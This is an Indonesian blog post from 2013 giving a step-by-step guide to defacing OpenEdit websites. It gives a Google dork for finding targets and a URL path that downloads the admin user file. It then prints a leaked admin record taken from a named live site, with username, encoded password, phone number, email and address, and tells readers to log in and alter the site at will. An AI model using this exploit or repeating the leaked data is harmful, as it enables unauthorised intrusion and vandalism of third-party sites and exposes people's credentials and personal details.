Posted by : Ham JavaNet Sabtu, 13 April 2013

Ketemu Lagi Dengan Ane Daffa-x207 :)
Langsung Aja :v

[#] Dorknya : 

Code:
inurl:openedit/authentication/

[#] Exploitnya :

Code:
/openedit/files/download/WEB-INF/users/admin.xml

langsung saja gak usah banyak bacot lagi ..
kita langsung masuk step by step cara defacenya .. 
kalo berhasil deface , jangan lupa cendol 

========
[#] Step 1 
========
- Kita Menuju Google Lalu masukan dork diatas , oh iya silakan explore sendiri dorknya biar lebih mantap

========
[#] Step 2 
========
- Pilih salah satu target digoogle tadi
Example : http://mcdev.openedit.com/

========
[#] Step 3
========
- Masukan Exploitnya Tadi 
jadinya kek gini ni : 
http://mcdev.openedit.com
/openedit/files/download/WEB-INF/users/admin.xml

========
[#] Step 4
========
- nah , kamu akan otomatis mengunduh sebuah file XML
setelah diunduh buka File XML yang unduh kamu tadi

========
[#] Step 5
========
- Didalam File XML tu ada Password Dan Username Admin sono .
Ni contohnya aneh dapet dari target atas tadi 


<?xml version="1.0" encoding="UTF-8" ?> 
- <user enabled="true">
  <user-name>admin</user-name> 
  <password>DES:en9gFy2YMf0=</password> 
  <creation-date>1145462580187</creation-date> 
- <properties>
  <property name="billingAddress1" value="kj" /> 
  <property name="billingAddress2" value="kllkj" /> 
  <property name="Phone1" value="512-788-6787" /> 
  <property name="addresslist" value="my house,Home" /> 
  <property name="TaxRate" value="0.0000" /> 
  <property name="billingState" value="LKJ" /> 
  <property name="ship2State" value="5" /> 
  <property name="BillingState" value="SOME STATE" /> 
  <property name="AllowEmail" value="false" /> 
  <property name="my houseAddress1" value="home street" /> 
  <property name="showopenjobs" value="false" /> 
  <property name="homeCity" value="sadf" /> 
  <property name="my houseCountry" value="USA" /> 
  <property name="showjobsearch" value="false" /> 
  <property name="ship2Country" value="5" /> 
  <property name="billingCity" value="lkj" /> 
  <property name="firstName" value="Admin" /> 
  <property name="billingCountry" value="klj" /> 
  <property name="Company" value="The Administrator" /> 
  <property name="BillingAddress1" value="adress line 1" /> 
  <property name="lastName" value="User" /> 
  <property name="BillingCountry" value="USA" /> 
  <property name="HomeCity" value="Cincinnati" /> 
  <property name="HomeCountry" value="USA" /> 
  <property name="oe.edit.mode" value="preview" /> 
  <property name="HomeState" value="OH" /> 
  <property name="ship2Address2" value="2" /> 
  <property name="homeCountry" value="sadf" /> 
  <property name="ship2Address1" value="3" /> 
  <property name="HomeAddress1" value="5052 Gray Rd" /> 
  <property name="ship2City" value="1" /> 
  <property name="openadmintoolbar" value="true" /> 
  <property name="showcategoryselection" value="false" /> 
  <property name="BillingCity" value="somewhere" /> 
  <property name="showassetmanager" value="false" /> 
  <property name="email" value="jvalencia@openedit.org" /> 
  <property name="failedlogincount" value="0" /> 
  <property name="showfilter" value="false" /> 
  <property name="homeState" value="SDF" /> 
  <property name="homeAddress2" value="sadf" /> 
  <property name="homeAddress1" value="fdsa" /> 
  <property name="showtodosearch" value="false" /> 
  <property name="showbasket" value="false" /> 
  <property name="HomeZipCode" value="45232" /> 
  </properties>
  <group id="greenbaydie" /> 
  <group id="administrators" /> 
  <group id="honda" /> 
  <group id="orderers" /> 
  </user> 


========
[#] Step 5
========
- Nah Tu Udah keliatan Pass adminnya 
Langsung Aja Deh Login Kesini 
http://mcdev.openedit.com/openedit/filemanager


========
[#] Step 6
========
- Done , Mision Selesai 
 Tgl Oprek Sesuka Hati
<password>DES:en9gFy2YMf0=</password>

Passwordnnya Yang warna Merah Gak Perlu Di Apa2in Lagi Langsung Login

Description: Deface Exploit Openedit
Rating: 4.5
Reviewer: Ham JavaNet
ItemReviewed: Deface Exploit Openedit

Leave a Reply

Monggo Tinggalkan Jejak Kaks :)

Subscribe to Posts | Subscribe to Comments

Welcome to My Blog

Popular Post

Labels

Arsip Blog

Followers

- Copyright © 2013 shad0w-share | Designed by Johanes Djogan -